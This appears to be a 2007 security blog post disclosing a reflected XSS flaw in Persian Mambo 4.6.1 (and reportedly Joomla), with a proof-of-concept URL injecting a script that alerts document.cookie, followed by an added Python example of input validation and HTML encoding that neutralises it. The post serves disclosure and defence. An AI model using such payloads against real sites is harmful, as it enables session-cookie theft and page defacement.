This site is a kind of personal database gathering notes about my day-to-day discoveries in the IT world, basically about security.
While some are howtos and tips (we learn a new thing every day, eh), hopefully you'll find some of them informative!

January 22, 2007

Persian Mambo V4.6.1 still vulnerable to XSS!!!


I just installed the latest Mambo version and ran this script:

http://localhost/mambo/index.php?option=com_content&task=view&id=18&Itemid=39%22%3E<script>alert(document.cookie)</script>&mosmsg=%3Ch1%3EHi,%20I%20am%20chr1x2%20,%20THIS%20IS%20XSS%PROBLEM!!!%3C/h1%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
They said this is already fixed?
I also ran the script in Joomla.
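
As an added example (not from the original post and not Mambo's own code), this Python sketch applies the two standard defenses to the request above: identifier parameters are validated as integers, and free-text parameters are HTML-encoded before they reach the page. Treating `id` and `Itemid` as integer-only, the function name `sanitize_query`, and the shortened sample URL are assumptions.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: the post's request with the run of <br> tags shortened.
SAMPLE_URL = (
    "http://localhost/mambo/index.php?option=com_content&task=view&id=18"
    "&Itemid=39%22%3E<script>alert(document.cookie)</script>"
    "&mosmsg=%3Ch1%3EHi%3C/h1%3E%3Cbr%3E"
)

# Assumption: these parameters are numeric identifiers and nothing else.
INT_PARAMS = {"id", "Itemid"}


def sanitize_query(url):
    """Return (clean, findings) for the query string of `url`.

    clean    -- parameters safe to use: ints for INT_PARAMS, HTML-encoded text otherwise
    findings -- (name, reason) for every parameter that carried unexpected content
    """
    clean, findings = {}, []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in INT_PARAMS:
            # Input validation: reject anything that is not a plain ASCII integer.
            if value.isascii() and value.isdigit():
                clean[name] = int(value)
            else:
                findings.append((name, "non-numeric value rejected"))
        else:
            # Output encoding: markup characters become inert entities.
            encoded = html.escape(value, quote=True)
            if encoded != value:
                findings.append((name, "markup characters encoded"))
            clean[name] = encoded
    return clean, findings


if __name__ == "__main__":
    clean, findings = sanitize_query(SAMPLE_URL)
    for name, reason in findings:
        print(f"{name}: {reason}")
    print(clean)
```
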
